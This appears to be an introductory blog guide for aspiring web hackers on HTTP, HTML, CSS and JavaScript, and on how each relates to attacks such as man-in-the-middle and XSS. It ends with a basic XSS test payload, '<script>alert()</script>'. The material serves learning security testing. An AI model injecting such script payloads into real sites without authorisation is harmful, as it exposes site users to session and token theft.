We will be taking you through some of the more common technologies used this day but know these are not the only things out there and this is also not the only path to success. I've crafted this guide to go from easiest to hardest bearing in min whether technology is front- or backend.
This is the protocol that describes how web pages are transferred over the internet, other examples of protocols are SSH or FTP. One big flaw in HTTP communication is the fact that it is not encrypted. If an attacker is able to pull off a min-the-middle attack where they place themselves between the victim and the internet, they might be able to read the packets without any issues at all. To prevent this, HTTPS was invented which relies on SSL certificates, issued by certificate authorities (CAs).
Modern-day web applications no longer consist of the static web pages we used to find at the beginning of the internet. Often these web applications take the form of complex projects that rely on dynamic data. When we talk about static webpages, these mostly consist of HTML, javascript, and CSS and we will refer to them as client-side from here on out. When we drag other technologies such as ASPX, PHP, or nodeJS into the mix, these back-end or server-side technologies breathe life through the applications.
HTML or hypertext markup language is one of the "markup" languages as the name implies. XML for example falls under this same category. A markup language is a system for annotating a document in a way that is visually distinguishable from the content. This is not important to know, what's important to know is that these structured documents are things we as attackers might be able to manipulate so I think it's important to learn at least the very basics of HTML.
Every HTML document will look like this:
<HTML>
<HEAD></HEAD>
<BODY></BODY>
</HTML>
"But uncle rat...", I hear you say, "I can make a document called "test.html" and simply put in a random string 'asdasd' and it will open and display the text just fine and you would be correct. HTML is very fault-tolerant and your browser will try to automatically correct any errors you made. This means that if the above structure is missing, your browser will put the text in between the structure for you. The fact this is supposed to happen and how it happens is all described in the HTML RFC documentation but we will get to that later. What you need to know for now is that this kind of auto-complete is one possible avenue for XSS attacks for example.
HTML pages on their own are perfectly functional but at some point, you might want to flair up your newly made website a little bit. You quickly run into problems however like most things you can do with HTML are limited to describing the document itself but when it comes to how to style those components, we need to look at CSS. This is still relatively harmless and only serves to describe the visual style of a document. This can be dangerous when inline CSS is being used and user-controlled data is inserted into that inline CSS but we will come back on that later. Inline CSS just means that the CSS is declared within the HTML documents instead of within a separate file.
body {
font-size: 10pt;
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
color: black;
line-height: 14pt;
padding-left: 5pt;
padding-right: 5pt;
padding-top: 5pt;
}
Now that we have a pretty static HTML page we might want to add some interactive elements such as an image carousel or a distance calculator. This is where HTML and CSS fall short and where JS comes in. This powerful scripting language looks like nothing like its namesake java. Where Java needs a VM for example, javascript is perfectly content by running in your browser and there have even been several libraries created for game development. Incidentally, I think the best way to learn something is to create things you enjoy and since I love gaming, this is how I learned to program as well.
(https://blog.bitsrc.io/9-top-js-gaming-engines-and-libraries-for-2020-81707d9f095)
Because javascript is so powerful, attackers will often try to leverage it to do things like steal session cookies or CSRF tokens. Anyone that wants to get serious about XSS should have at least a surface-level understanding of javascript and be very willing to learn while hacking. Of course, most javascript concepts can be taught fairly easily but to intuitively debug a script that is not displaying an XSS attack vector, is a different story.
<script>alert()</script>